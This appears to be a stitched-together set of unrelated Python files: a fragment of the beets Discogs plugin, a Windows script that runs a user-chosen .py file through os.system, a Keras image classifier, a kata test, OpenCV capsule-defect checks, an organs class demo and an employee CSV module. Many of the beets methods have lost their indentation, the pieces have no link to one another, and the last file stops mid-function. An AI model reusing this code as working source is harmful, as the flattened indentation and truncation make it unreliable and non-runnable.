self._log.warning(('python3-discogs-client version should be '
'>= 2.3.15'))
    def setup(self, session=None):
        """Create the `discogs_client` field. Authenticate if necessary.

        Runs on `import_begin`; *session* is the import session (unused).
        Prefers a configured personal user token; otherwise loads a cached
        OAuth token from the token file or runs the interactive OAuth flow.
        """
        c_key = self.config['apikey'].as_str()
        c_secret = self.config['apisecret'].as_str()
        # Try using a configured user token (bypassing OAuth login).
        user_token = self.config['user_token'].as_str()
        if user_token:
            # The rate limit for authenticated users goes up to 60
            # requests per minute.
            self.discogs_client = Client(USER_AGENT, user_token=user_token)
            return
        # Get the OAuth token from a file or log in.
        try:
            with open(self._tokenfile()) as f:
                tokendata = json.load(f)
        except OSError:
            # No token yet. Generate one.
            token, secret = self.authenticate(c_key, c_secret)
        else:
            token = tokendata['token']
            secret = tokendata['secret']
        self.discogs_client = Client(USER_AGENT, c_key, c_secret,
                                     token, secret)
def reset_auth(self):
"""Delete token file & redo the auth steps.
"""
os.remove(self._tokenfile())
self.setup()
def _tokenfile(self):
"""Get the path to the JSON file for storing the OAuth token.
"""
return self.config['tokenfile'].get(confuse.Filename(in_app_dir=True))
    def authenticate(self, c_key, c_secret):
        """Run the interactive OAuth flow and return a (token, secret) pair.

        Prints an authorization URL, asks the user for the resulting code,
        and caches the granted token pair in the token file for later runs.
        Raises `beets.ui.UserError` when Discogs is unreachable or the code
        is rejected.
        """
        # Get the link for the OAuth page.
        auth_client = Client(USER_AGENT, c_key, c_secret)
        try:
            _, _, url = auth_client.get_authorize_url()
        except CONNECTION_ERRORS as e:
            self._log.debug('connection error: {0}', e)
            raise beets.ui.UserError('communication with Discogs failed')
        beets.ui.print_("To authenticate with Discogs, visit:")
        beets.ui.print_(url)
        # Ask for the code and validate it.
        code = beets.ui.input_("Enter the code:")
        try:
            token, secret = auth_client.get_access_token(code)
        except DiscogsAPIError:
            raise beets.ui.UserError('Discogs authorization failed')
        except CONNECTION_ERRORS as e:
            self._log.debug('connection error: {0}', e)
            raise beets.ui.UserError('Discogs token request failed')
        # Save the token for later use.
        self._log.debug('Discogs token {0}, secret {1}', token, secret)
        with open(self._tokenfile(), 'w') as f:
            json.dump({'token': token, 'secret': secret}, f)
        return token, secret
def album_distance(self, items, album_info, mapping):
"""Returns the album distance.
"""
return get_distance(
data_source='Discogs',
info=album_info,
config=self.config
)
def track_distance(self, item, track_info):
"""Returns the track distance.
"""
return get_distance(
data_source='Discogs',
info=track_info,
config=self.config
)
def candidates(self, items, artist, album, va_likely, extra_tags=None):
"""Returns a list of AlbumInfo objects for discogs search results
matching an album and artist (if not various).
"""
if not self.discogs_client:
return
if not album and not artist:
self._log.debug('Skipping Discogs query. Files missing album and '
'artist tags.')
return []
if va_likely:
query = album
else:
query = f'{artist} {album}'
try:
return self.get_albums(query)
except DiscogsAPIError as e:
self._log.debug('API Error: {0} (query: {1})', e, query)
if e.status_code == 401:
self.reset_auth()
return self.candidates(items, artist, album, va_likely)
else:
return []
except CONNECTION_ERRORS:
self._log.debug('Connection error in album search', exc_info=True)
return []
def get_track_from_album_by_title(self, album_info, title,
dist_threshold=0.3):
def compare_func(track_info):
track_title = getattr(track_info, "title", None)
dist = string_dist(track_title, title)
return (track_title and dist < dist_threshold)
return self.get_track_from_album(album_info, compare_func)
def get_track_from_album(self, album_info, compare_func):
"""Return the first track of the release where `compare_func` returns
true.
:return: TrackInfo object.
:rtype: beets.autotag.hooks.TrackInfo
"""
if not album_info:
return None
for track_info in album_info.tracks:
# check for matching position
if not compare_func(track_info):
continue
# attach artist info if not provided
if not track_info['artist']:
track_info['artist'] = album_info.artist
track_info['artist_id'] = album_info.artist_id
# attach album info
track_info['album'] = album_info.album
return track_info
return None
def item_candidates(self, item, artist, title):
"""Returns a list of TrackInfo objects for Search API results
matching ``title`` and ``artist``.
:param item: Singleton item to be matched.
:type item: beets.library.Item
:param artist: The artist of the track to be matched.
:type artist: str
:param title: The title of the track to be matched.
:type title: str
:return: Candidate TrackInfo objects.
:rtype: list[beets.autotag.hooks.TrackInfo]
"""
if not self.discogs_client:
return
if not artist and not title:
self._log.debug('Skipping Discogs query. File missing artist and '
'title tags.')
return
query = f'{artist} {title}'
try:
albums = self.get_albums(query)
except DiscogsAPIError as e:
self._log.debug('API Error: {0} (query: {1})', e, query)
if e.status_code == 401:
self.reset_auth()
return self.item_candidates(item, artist, title)
else:
return []
except CONNECTION_ERRORS:
self._log.debug('Connection error in track search', exc_info=True)
candidates = []
for album_cur in albums:
self._log.debug(u'searching within album {0}', album_cur.album)
track_result = self.get_track_from_album_by_title(
album_cur, item['title']
)
if track_result:
candidates.append(track_result)
# first 10 results, don't overwhelm with options
return candidates[:10]
    def album_for_id(self, album_id):
        """Fetches an album by its Discogs ID and returns an AlbumInfo object
        or None if the album is not found.

        Accepts a raw ID or a Discogs release URL; a 401 resets the cached
        token and retries once.
        """
        if not self.discogs_client:
            return
        self._log.debug('Searching for release {0}', album_id)
        discogs_id = extract_discogs_id_regex(album_id)
        if not discogs_id:
            return None
        result = Release(self.discogs_client, {'id': discogs_id})
        # Try to obtain title to verify that we indeed have a valid Release
        try:
            getattr(result, 'title')
        except DiscogsAPIError as e:
            if e.status_code != 404:
                self._log.debug('API Error: {0} (query: {1})', e,
                                result.data['resource_url'])
                if e.status_code == 401:
                    self.reset_auth()
                    return self.album_for_id(album_id)
            return None
        except CONNECTION_ERRORS:
            self._log.debug('Connection error in album lookup',
                            exc_info=True)
            return None
        return self.get_album_info(result)
def get_albums(self, query):
"""Returns a list of AlbumInfo objects for a discogs search query.
"""
# Strip non-word characters from query. Things like "!" and "-" can
# cause a query to return no results, even if they match the artist or
# album title. Use `re.UNICODE` flag to avoid stripping non-english
# word characters.
query = re.sub(r'(?u)\W+', ' ', query)
# Strip medium information from query, Things like "CD1" and "disk 1"
# can also negate an otherwise positive result.
query = re.sub(r'(?i)\b(CD|disc|vinyl)\s*\d+', '', query)
try:
releases = self.discogs_client.search(query,
type='release').page(1)
except CONNECTION_ERRORS:
self._log.debug("Communication error while searching for {0!r}",
query, exc_info=True)
return []
return [album for album in map(self.get_album_info, releases[:5])
if album]
    def get_master_year(self, master_id):
        """Fetches a master release given its Discogs ID and returns its year
        or None if the master release is not found.

        A 401 resets the cached token and retries once; connection errors
        yield None.
        """
        self._log.debug('Searching for master release {0}', master_id)
        result = Master(self.discogs_client, {'id': master_id})
        try:
            year = result.fetch('year')
            return year
        except DiscogsAPIError as e:
            if e.status_code != 404:
                self._log.debug('API Error: {0} (query: {1})', e,
                                result.data['resource_url'])
                if e.status_code == 401:
                    self.reset_auth()
                    return self.get_master_year(master_id)
            return None
        except CONNECTION_ERRORS:
            self._log.debug('Connection error in master release lookup',
                            exc_info=True)
            return None
    def get_album_info(self, result):
        """Returns an AlbumInfo object for a discogs Release object.

        Returns None when the release lacks the minimal required fields.
        Reads the global beets `config` for the various-artists name.
        """
        # Explicitly reload the `Release` fields, as they might not be yet
        # present if the result is from a `discogs_client.search()`.
        if not result.data.get('artists'):
            result.refresh()
        # Sanity check for required fields. The list of required fields is
        # defined at Guideline 1.3.1.a, but in practice some releases might be
        # lacking some of these fields. This function expects at least:
        # `artists` (>0), `title`, `id`, `tracklist` (>0)
        # https://www.discogs.com/help/doc/submission-guidelines-general-rules
        if not all([result.data.get(k) for k in ['artists', 'title', 'id',
                                                 'tracklist']]):
            self._log.warning("Release does not contain the required fields")
            return None
        artist, artist_id = MetadataSourcePlugin.get_artist(
            [a.data for a in result.artists],
            join_key='join'
        )
        # Collapse runs of spaces left by Discogs formatting.
        album = re.sub(r' +', ' ', result.title)
        album_id = result.data['id']
        # Use `.data` to access the tracklist directly instead of the
        # convenient `.tracklist` property, which will strip out useful artist
        # information and leave us with skeleton `Artist` objects that will
        # each make an API call just to get the same data back.
        tracks = self.get_tracks(result.data['tracklist'])
        # Extract information for the optional AlbumInfo fields, if possible.
        va = result.data['artists'][0].get('name', '').lower() == 'various'
        year = result.data.get('year')
        mediums = [t.medium for t in tracks]
        country = result.data.get('country')
        data_url = result.data.get('uri')
        style = self.format(result.data.get('styles'))
        base_genre = self.format(result.data.get('genres'))
        if self.config['append_style_genre'] and style:
            genre = self.config['separator'].as_str().join([base_genre, style])
        else:
            genre = base_genre
        discogs_albumid = extract_discogs_id_regex(result.data.get('uri'))
        # Extract information for the optional AlbumInfo fields that are
        # contained on nested discogs fields.
        albumtype = media = label = catalogno = labelid = None
        if result.data.get('formats'):
            albumtype = ', '.join(
                result.data['formats'][0].get('descriptions', [])) or None
            media = result.data['formats'][0]['name']
        if result.data.get('labels'):
            label = result.data['labels'][0].get('name')
            catalogno = result.data['labels'][0].get('catno')
            labelid = result.data['labels'][0].get('id')
        # Additional cleanups (various artists name, catalog number, media).
        if va:
            artist = config['va_name'].as_str()
        if catalogno == 'none':
            catalogno = None
        # Explicitly set the `media` for the tracks, since it is expected by
        # `autotag.apply_metadata`, and set `medium_total`.
        for track in tracks:
            track.media = media
            track.medium_total = mediums.count(track.medium)
            if not track.artist:  # get_track_info often fails to find artist
                track.artist = artist
            if not track.artist_id:
                track.artist_id = artist_id
            # Discogs does not have track IDs. Invent our own IDs as proposed
            # in #2336.
            track.track_id = str(album_id) + "-" + track.track_alt
            track.data_url = data_url
            track.data_source = 'Discogs'
        # Retrieve master release id (returns None if there isn't one).
        master_id = result.data.get('master_id')
        # Assume `original_year` is equal to `year` for releases without
        # a master release, otherwise fetch the master release.
        original_year = self.get_master_year(master_id) if master_id else year
        return AlbumInfo(album=album, album_id=album_id, artist=artist,
                         artist_id=artist_id, tracks=tracks,
                         albumtype=albumtype, va=va, year=year,
                         label=label, mediums=len(set(mediums)),
                         releasegroup_id=master_id, catalognum=catalogno,
                         country=country, style=style, genre=genre,
                         media=media, original_year=original_year,
                         data_source='Discogs', data_url=data_url,
                         discogs_albumid=discogs_albumid,
                         discogs_labelid=labelid, discogs_artistid=artist_id)
def format(self, classification):
if classification:
return self.config['separator'].as_str() \
.join(sorted(classification))
else:
return None
    def get_tracks(self, tracklist):
        """Returns a list of TrackInfo objects for a discogs tracklist.

        Merges subtracks, numbers real tracks, derives medium/medium_index
        from the Discogs positions, and attaches disc titles taken from
        index tracks.
        """
        try:
            clean_tracklist = self.coalesce_tracks(tracklist)
        except Exception as exc:
            # FIXME: this is an extra precaution for making sure there are no
            # side effects after #2222. It should be removed after further
            # testing.
            self._log.debug('{}', traceback.format_exc())
            self._log.error('uncaught exception in coalesce_tracks: {}', exc)
            clean_tracklist = tracklist
        tracks = []
        index_tracks = {}
        index = 0
        # Distinct works and intra-work divisions, as defined by index tracks.
        divisions, next_divisions = [], []
        for track in clean_tracklist:
            # Only real tracks have `position`. Otherwise, it's an index track.
            if track['position']:
                index += 1
                if next_divisions:
                    # End of a block of index tracks: update the current
                    # divisions.
                    divisions += next_divisions
                    del next_divisions[:]
                track_info = self.get_track_info(track, index, divisions)
                track_info.track_alt = track['position']
                tracks.append(track_info)
            else:
                next_divisions.append(track['title'])
                # We expect new levels of division at the beginning of the
                # tracklist (and possibly elsewhere).
                try:
                    divisions.pop()
                except IndexError:
                    pass
                index_tracks[index + 1] = track['title']
        # Fix up medium and medium_index for each track. Discogs position is
        # unreliable, but tracks are in order.
        medium = None
        medium_count, index_count, side_count = 0, 0, 0
        sides_per_medium = 1
        # If a medium has two sides (ie. vinyl or cassette), each pair of
        # consecutive sides should belong to the same medium.
        if all([track.medium is not None for track in tracks]):
            m = sorted({track.medium.lower() for track in tracks})
            # If all track.medium are single consecutive letters, assume it is
            # a 2-sided medium.
            if ''.join(m) in ascii_lowercase:
                sides_per_medium = 2
        for track in tracks:
            # Handle special case where a different medium does not indicate a
            # new disc, when there is no medium_index and the ordinal of medium
            # is not sequential. For example, I, II, III, IV, V. Assume these
            # are the track index, not the medium.
            # side_count is the number of mediums or medium sides (in the case
            # of two-sided mediums) that were seen before.
            medium_is_index = track.medium and not track.medium_index and (
                len(track.medium) != 1 or
                # Not within standard incremental medium values (A, B, C, ...).
                ord(track.medium) - 64 != side_count + 1
            )
            if not medium_is_index and medium != track.medium:
                side_count += 1
                if sides_per_medium == 2:
                    if side_count % sides_per_medium:
                        # Two-sided medium changed. Reset index_count.
                        index_count = 0
                        medium_count += 1
                else:
                    # Medium changed. Reset index_count.
                    medium_count += 1
                    index_count = 0
                medium = track.medium
            index_count += 1
            medium_count = 1 if medium_count == 0 else medium_count
            track.medium, track.medium_index = medium_count, index_count
        # Get `disctitle` from Discogs index tracks. Assume that an index track
        # before the first track of each medium is a disc title.
        for track in tracks:
            if track.medium_index == 1:
                if track.index in index_tracks:
                    disctitle = index_tracks[track.index]
                else:
                    disctitle = None
                track.disctitle = disctitle
        return tracks
    def coalesce_tracks(self, raw_tracklist):
        """Pre-process a tracklist, merging subtracks into a single track. The
        title for the merged track is the one from the previous index track,
        if present; otherwise it is a combination of the subtracks titles.

        Returns a new tracklist; `raw_tracklist` entries are Discogs
        tracklist dicts (`position`, `title`, optional `sub_tracks`).
        """
        def add_merged_subtracks(tracklist, subtracks):
            """Modify `tracklist` in place, merging a list of `subtracks` into
            a single track into `tracklist`."""
            # Calculate position based on first subtrack, without subindex.
            idx, medium_idx, sub_idx = \
                self.get_track_index(subtracks[0]['position'])
            position = '{}{}'.format(idx or '', medium_idx or '')
            if tracklist and not tracklist[-1]['position']:
                # Assume the previous index track contains the track title.
                if sub_idx:
                    # "Convert" the track title to a real track, discarding the
                    # subtracks assuming they are logical divisions of a
                    # physical track (12.2.9 Subtracks).
                    tracklist[-1]['position'] = position
                else:
                    # Promote the subtracks to real tracks, discarding the
                    # index track, assuming the subtracks are physical tracks.
                    index_track = tracklist.pop()
                    # Fix artists when they are specified on the index track.
                    if index_track.get('artists'):
                        for subtrack in subtracks:
                            if not subtrack.get('artists'):
                                subtrack['artists'] = index_track['artists']
                    # Concatenate index with track title when index_tracks
                    # option is set
                    if self.config['index_tracks']:
                        for subtrack in subtracks:
                            subtrack['title'] = '{}: {}'.format(
                                index_track['title'], subtrack['title'])
                    tracklist.extend(subtracks)
            else:
                # Merge the subtracks, pick a title, and append the new track.
                track = subtracks[0].copy()
                track['title'] = ' / '.join([t['title'] for t in subtracks])
                tracklist.append(track)
        # Pre-process the tracklist, trying to identify subtracks.
        subtracks = []
        tracklist = []
        prev_subindex = ''
        for track in raw_tracklist:
            # Regular subtrack (track with subindex).
            if track['position']:
                _, _, subindex = self.get_track_index(track['position'])
                if subindex:
                    # Right-justify so e.g. "10" sorts after "9" when
                    # compared as strings.
                    if subindex.rjust(len(raw_tracklist)) > prev_subindex:
                        # Subtrack still part of the current main track.
                        subtracks.append(track)
                    else:
                        # Subtrack part of a new group (..., 1.3, *2.1*, ...).
                        add_merged_subtracks(tracklist, subtracks)
                        subtracks = [track]
                    prev_subindex = subindex.rjust(len(raw_tracklist))
                    continue
            # Index track with nested sub_tracks.
            if not track['position'] and 'sub_tracks' in track:
                # Append the index track, assuming it contains the track title.
                tracklist.append(track)
                add_merged_subtracks(tracklist, track['sub_tracks'])
                continue
            # Regular track or index track without nested sub_tracks.
            if subtracks:
                add_merged_subtracks(tracklist, subtracks)
                subtracks = []
                prev_subindex = ''
            tracklist.append(track)
        # Merge and add the remaining subtracks, if any.
        if subtracks:
            add_merged_subtracks(tracklist, subtracks)
        return tracklist
def get_track_info(self, track, index, divisions):
"""Returns a TrackInfo object for a discogs track.
"""
title = track['title']
if self.config['index_tracks']:
prefix = ', '.join(divisions)
if prefix:
title = f'{prefix}: {title}'
track_id = None
medium, medium_index, _ = self.get_track_index(track['position'])
artist, artist_id = MetadataSourcePlugin.get_artist(
track.get('artists', []),
join_key='join'
)
length = self.get_track_length(track['duration'])
return TrackInfo(title=title, track_id=track_id, artist=artist,
artist_id=artist_id, length=length, index=index,
medium=medium, medium_index=medium_index)
def get_track_index(self, position):
"""Returns the medium, medium index and subtrack index for a discogs
track position."""
# Match the standard Discogs positions (12.2.9), which can have several
# forms (1, 1-1, A1, A1.1, A1a, ...).
match = re.match(
r'^(.*?)' # medium: everything before medium_index.
r'(\d*?)' # medium_index: a number at the end of
# `position`, except if followed by a subtrack
# index.
# subtrack_index: can only be matched if medium
# or medium_index have been matched, and can be
r'((?<=\w)\.[\w]+' # - a dot followed by a string (A.1, 2.A)
r'|(?<=\d)[A-Z]+' # - a string that follows a number (1A, B2a)
r')?'
r'$',
position.upper()
)
if match:
medium, index, subindex = match.groups()
if subindex and subindex.startswith('.'):
subindex = subindex[1:]
else:
self._log.debug('Invalid position: {0}', position)
medium = index = subindex = None
return medium or None, index or None, subindex or None
def get_track_length(self, duration):
"""Returns the track length in seconds for a discogs duration.
"""
try:
length = time.strptime(duration, '%M:%S')
except ValueError:
return None
return length.tm_min * 60 + length.tm_sec
|
import os
def program():
    """Interactively pick a directory and a .py file inside it, then run it.

    Windows-specific: uses 'dir' and the 'py' launcher via os.system.
    """
    print("Welcome to the python program that runs python programs")
    print()
    path = input("What is the directory of the file? : ")
    # BUG FIX: os.system("cd " + path) changed the directory only inside a
    # throwaway subshell, so the later 'dir' and 'py' commands still ran in
    # the original directory. os.chdir changes this process's cwd, which
    # child shells inherit.
    os.chdir(path)
    print("These are all the python files in this directory : ")
    input("Press 'enter' to continue")
    os.system("dir /S *.py")
    print()
    print()
    print()
    filename = input("What is the file you want to run? (Include '.py') : ")
    print()
    input("Press enter to run the file")
    os.system("py "+filename)
program()
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon May 27 12:28:37 2019
@author: kj22643
"""
# This is a first pass attempt to work with the adata file and identify the
# survivors and non-survivors from the lineage information in the sample.
|
from keras.applications import inception_resnet_v2
from keras.models import Sequential
from keras.layers import Dense, Conv2D, Flatten
from keras import layers
from keras.optimizers import Adam
def build_model_Inception_Resnet():
    """Create and compile a 2-unit classifier on top of an ImageNet-pretrained
    InceptionResNetV2 backbone expecting 224x224 RGB inputs.

    NOTE(review): the head pairs a sigmoid activation with
    categorical_crossentropy; for two mutually exclusive classes a softmax
    head (or binary_crossentropy with a 1-unit head) is the usual pairing —
    confirm which was intended.
    """
    backbone = inception_resnet_v2.InceptionResNetV2(
        weights='imagenet', include_top=False, input_shape=(224, 224, 3))
    model = Sequential([
        backbone,
        layers.GlobalMaxPooling2D(),
        layers.Dropout(0.5),
        layers.Dense(2, activation='sigmoid'),
    ])
    model.compile(loss='categorical_crossentropy',
                  optimizer=Adam(lr=0.0005),
                  metrics=['accuracy'])
    return model
|
import unittest
from katas.kyu_7.easy_mathematical_callback import process_array
class ProcessArrayTestCase(unittest.TestCase):
    """Checks that process_array maps the callback over every element."""

    def test_equals(self):
        actual = process_array([4, 8, 2, 7, 5], lambda val: val * 2)
        self.assertEqual(actual, [8, 16, 4, 14, 10])

    def test_equals_2(self):
        actual = process_array([7, 8, 9, 1, 2], lambda val: val + 5)
        self.assertEqual(actual, [12, 13, 14, 6, 7])

    def test_equals_3(self):
        actual = process_array([-1, 1, 2, 3, 4, 5], lambda val: val ** 3)
        self.assertEqual(actual, [-1, 1, 8, 27, 64, 125])

    def test_equals_4(self):
        # An empty input must produce an empty output.
        self.assertEqual(process_array([], lambda val: val + 1), [])
|
# 胶囊气泡、大小头等瑕疵检测
import cv2 as cv
import os
import numpy as np
def balance_check(img_path, img_file, im, im_gray):
    """Detect big-end/small-end (asymmetry) defects in a capsule image.

    Compares the capsule's width along two horizontal lines (at 1/4 and 3/4
    of its height); a difference > 8 pixels is reported as a defect.

    :param img_path: full path of the image (used only in printed messages)
    :param img_file: file name (unused here)
    :param im: original BGR image; drawn on in place and shown
    :param im_gray: grayscale version of ``im``
    """
    # Edge-extraction alternatives kept for reference:
    # sobel = cv.Sobel(im_gray, cv.CV_64F,
    # 1, 1, ksize=5)
    # cv.imshow("sobel", sobel)
    # lap = cv.Laplacian(im_gray, cv.CV_64F)
    # cv.imshow("lap", lap)
    # Blur and dilate to suppress fine detail before edge detection.
    blurred = cv.GaussianBlur(im_gray, (5, 5), 0)
    kernel = np.ones((5,5), np.uint8)
    dilate = cv.dilate(blurred, kernel)
    cv.imshow("dilate", dilate)
    canny = cv.Canny(dilate, 60, 200)
    cv.imshow("canny", canny)
    # Extract contours from the Canny edge image.
    # NOTE(review): the 3-value return is the OpenCV 3.x API; OpenCV 4.x
    # returns (contours, hierarchy) only -- confirm the installed version.
    img, cnts, hie = cv.findContours(canny,
                                     cv.RETR_LIST,
                                     cv.CHAIN_APPROX_NONE)
    # Compute each contour's perimeter and filter by it.
    new_cnts = []  # contours that survive filtering
    if len(cnts) > 0:
        for c in cnts:  # visit every contour
            circle_len = cv.arcLength(c, True)
            #print("circle_len:", circle_len)
            if circle_len > 1000:  # drop contours with perimeter <= 1000
                new_cnts.append(c)
    # Sort the surviving contours by area, descending.
    new_cnts = sorted(new_cnts,
                      key=cv.contourArea,
                      reverse=True)
    new_cnts = new_cnts[1:2]  # keep only the second-largest contour
    # Draw the selected contour on the original image.
    im_cnt = cv.drawContours(im,
                             new_cnts,
                             -1,
                             (0, 0, 255), 2)
    cv.imshow("im_cnt", im_cnt)
    # Find the bounding extremes of the pill contour.
    # NOTE(review): new_cnts[0] raises IndexError when fewer than two
    # contours survived the filters above -- confirm inputs always contain
    # the pill outline.
    max_x, max_y = new_cnts[0][0][0][0], new_cnts[0][0][0][1]
    min_x, min_y = max_x, max_y
    for cnt in new_cnts[0]:
        if cnt[0][0] >= max_x:
            max_x = cnt[0][0]
        if cnt[0][0] <= min_x:
            min_x = cnt[0][0]
        if cnt[0][1] >= max_y:
            max_y = cnt[0][1]
        if cnt[0][1] <= min_y:
            min_y = cnt[0][1]
    # Bounding-box drawing kept for reference:
    #cv.line(im, (min_x, min_y), (max_x, min_y),
    # (0, 0, 255), 2)
    # cv.line(im, (max_x, min_y), (max_x, max_y),
    # (0, 0, 255), 2)
    # cv.line(im, (max_x, max_y), (min_x, max_y),
    # (0, 0, 255), 2)
    # cv.line(im, (min_x, max_y), (min_x, min_y),
    # (0, 0, 255), 2)
    # Vertical midline of the pill contour.
    mid_y = int((min_y + max_y) / 2)  # y coordinate of the midline
    # cv.line(im, (min_x, mid_y), (max_x, mid_y),
    # (0, 0, 255), 2)
    mid_up = int((min_y + mid_y) / 2)
    mid_down = int((max_y + mid_y) / 2)
    cv.line(im, (min_x, mid_up), (max_x, mid_up),
            (0, 0, 255), 2)
    cv.line(im, (min_x, mid_down), (max_x, mid_down),
            (0, 0, 255), 2)
    #cv.imshow("im_line", im)
    # Intersections of the contour with the upper and lower quarter lines.
    cross_point_up = set()
    cross_point_down = set()
    for cnt in new_cnts[0]:  # visit every contour point
        x, y = cnt[0][0], cnt[0][1]
        if y == mid_up:
            cross_point_up.add((x, y))
        if y == mid_down:
            cross_point_down.add((x, y))
    # Convert the sets to lists for indexing.
    cross_point_up = list(cross_point_up)
    cross_point_down = list(cross_point_down)
    for p in cross_point_up:
        cv.circle(im,
                  (p[0], p[1]), 8,  # center, radius
                  (0,0,255), 2)
    for p in cross_point_down:
        cv.circle(im,
                  (p[0], p[1]), 8,  # center, radius
                  (0,0,255), 2)
    cv.imshow("im_circle", im)
    # Widths along the upper and lower quarter lines.
    # NOTE(review): assumes exactly two crossings per line; fewer raise
    # IndexError and more than two pick an arbitrary pair -- TODO confirm.
    len_up, len_down = 0, 0
    len_up = abs(cross_point_up[0][0] - cross_point_up[1][0])
    len_down = abs(cross_point_down[0][0] - cross_point_down[1][0])
    print("len_up:", len_up, " len_down:", len_down)
    if abs(len_up - len_down) > 8:
        print("大小头:", img_path)
    else:
        print("上下均衡:", img_path)
# Bubble detection function
def bub_check(img_path, img_file, im, im_gray):
    """Detect air-bubble defects in a capsule image.

    Thresholds and erodes the grayscale image, extracts contours, keeps
    those with area in (10, 10000), and reports a bubble when any survive.

    :param img_path: full path of the image (used in printed messages)
    :param img_file: file name (unused here)
    :param im: original BGR image; drawn on in place and shown
    :param im_gray: grayscale version of ``im``
    """
    # Binarize
    ret, im_bin = cv.threshold(im_gray,
                               170, 255,
                               cv.THRESH_BINARY)
    cv.imshow("im_bin", im_bin)
    # Erode to remove speckle
    kernel = np.ones((1, 1), np.uint8)  # structuring element
    erosion = cv.erode(im_bin, kernel, iterations=3)
    cv.imshow("erosion", erosion)
    # Extract contours.
    # NOTE(review): 3-value return is the OpenCV 3.x API; 4.x returns
    # (contours, hierarchy) only -- confirm the installed version.
    img, cnts, hie = cv.findContours(
        erosion,                # image
        cv.RETR_LIST,           # retrieve all contours
        cv.CHAIN_APPROX_NONE)   # keep every contour point
    new_cnts = []  # contours that survive area filtering
    # Filter out contours that are too large or too small.
    if len(cnts) > 0 :
        for cnt in cnts:
            area = cv.contourArea(cnt)
            print("area:", area)
            if area < 10000 and area > 10:
                new_cnts.append(cnt)
    im_cnt = cv.drawContours(im,         # draw on the original image
                             new_cnts,   # filtered contours
                             -1,         # draw all of them
                             (0, 0, 255), 2)  # color and thickness
    cv.imshow("im_cnt", im_cnt)
    # BUG FIX: the original tested len(im_cnt) -- the image's row count,
    # which is always > 0 -- instead of the number of surviving contours.
    if len(new_cnts) > 0:
        print("检测到气泡:", img_path)
        # Move the image
        # ...
if __name__ == "__main__":
    # Read every image to be inspected.
    img_dir = "test_img"  # directory containing the sample images
    img_files = os.listdir(img_dir)
    for img_file in img_files:
        # Build the image's full path.
        img_path = os.path.join(img_dir,
                                img_file)
        # Load the image data (color + grayscale).
        im = cv.imread(img_path, 1)
        im_gray = cv.cvtColor(im,
                              cv.COLOR_BGR2GRAY)
        cv.imshow("im", im)
        cv.imshow("im_gray", im_gray)
        # Run bubble detection:
        #bub_check(img_path, img_file, im, im_gray)
        # Run big/small-end detection:
        balance_check(img_path, img_file, im, im_gray)
        cv.waitKey()
    cv.destroyAllWindows()
|
class Organs:
    """Container for body-part attributes shared by the body subclasses."""

    def __init__(self, small_finger=None, ring_finger=None, middle_finger=None, index_finger=None, thumb=None,
                 little_toe=None, ring_toe=None, middle_toe=None, long_toe=None, big_toe=None,
                 left_ear=None, right_ear=None, left_eye=None, right_eye=None, mouth=None, nose=None, teeth=None):
        # Hand
        self.small_finger = small_finger
        self.ring_finger = ring_finger
        # BUG FIX: attribute was 'middle_finger_' (stray trailing
        # underscore), inconsistent with its parameter and siblings.
        self.middle_finger = middle_finger
        self.index_finger = index_finger
        self.thumb = thumb
        # Foot
        self.little_toe = little_toe
        self.ring_toe = ring_toe
        self.middle_toe = middle_toe
        self.long_toe = long_toe
        self.big_toe = big_toe
        # Face
        self.left_ear = left_ear
        self.right_ear = right_ear
        self.left_eye = left_eye
        self.right_eye = right_eye
        self.mouth = mouth
        self.nose = nose
        self.teeth = teeth

    def speak(self):
        # Demo helper: prints whatever value landed in small_finger.
        print(f"this is {self.small_finger}")
# Right hand
class Right_hand(Organs):
    def __init__(self, small_finger=None, ring_finger=None, middle_finger=None, index_finger=None, thumb=None):
        # Positional args line up with Organs' finger parameters.
        super().__init__(small_finger, ring_finger, middle_finger, index_finger, thumb)
# Left hand
class Left_hand(Organs):
    def __init__(self, small_finger=None, ring_finger=None, middle_finger=None, index_finger=None, thumb=None):
        # Positional args line up with Organs' finger parameters.
        super().__init__(small_finger, ring_finger, middle_finger, index_finger, thumb)
# Right foot
class Right_foot(Organs):
    def __init__(self, little_toe=None, ring_toe=None, middle_toe=None, long_toe=None, big_toe=None):
        # BUG FIX: the toes were passed positionally and therefore landed in
        # Organs' *finger* slots (little_toe -> small_finger, ...); pass them
        # by keyword so they populate the toe attributes.
        super().__init__(little_toe=little_toe, ring_toe=ring_toe,
                         middle_toe=middle_toe, long_toe=long_toe,
                         big_toe=big_toe)
# Left foot
class Left_foot(Organs):
    def __init__(self, little_toe=None, ring_toe=None, middle_toe=None, long_toe=None, big_toe=None):
        # BUG FIX: the toes were passed positionally and therefore landed in
        # Organs' *finger* slots; pass them by keyword so they populate the
        # toe attributes.
        super().__init__(little_toe=little_toe, ring_toe=ring_toe,
                         middle_toe=middle_toe, long_toe=long_toe,
                         big_toe=big_toe)
# Face
class Face(Organs):
    def __init__(self, left_ear=None, right_ear=None, left_eye=None, right_eye=None, mouth=None, nose=None, teeth=None):
        # NOTE(review): these positional args land in Organs' *finger*
        # parameters (left_ear -> small_finger, ...); the demo below relies
        # on this (Face('sss').speak() prints 'sss'). Passing keywords would
        # fix the attribute mapping but change that output -- confirm intent.
        super().__init__(left_ear, right_ear, left_eye, right_eye, mouth, nose, teeth)
# Demo: the first positional arg reaches Organs.small_finger, which speak()
# prints ("this is sss").
d1 = Face('sss')
d1.speak()
|
import csv
import os
import datetime
employees_csv = 'employees.csv'
employees_temp = 'employees_temp.csv'
class Employee:
    """A single employee record: UID, name, phone number, and age."""

    def __init__(self, employee_id, name, phone, age):
        self.uid = employee_id
        self.name = name
        self.phone = phone
        self.age = age

    def add_employee(self):
        """Append this employee as one CSV row to the employees file."""
        # TODO: Validate that all the data is provided
        # TODO: decide if this should happen here on in the init phase
        # TODO: Check if the employee already exists in the file
        # CONSISTENCY FIX: use the module-level employees_csv constant
        # instead of repeating the 'employees.csv' literal.
        with open(employees_csv, 'a', newline='') as employees_file:
            fields = [self.uid, self.name, self.phone, self.age]
            writer = csv.writer(employees_file)
            writer.writerow(fields)
def add_from_file(file):
    """Read employee rows (uid, name, phone, birth year) from a CSV file
    and append the valid ones to the employees file.

    Stops at the first invalid row (preserves the original break-on-error
    behaviour).
    """
    with open(file, 'r') as to_add:
        for employee in csv.reader(to_add, delimiter=","):
            if employee[0].isdigit():
                uid = employee[0]
            else:
                print("Invalid UID field- UID must be a number")
                break
            if str(employee[1]).isalpha():
                name = employee[1]
            else:
                print("Invalid name field for UID {0}".format(uid))
                break
            # TODO: consider adding a system to retry/ drop back to main menu
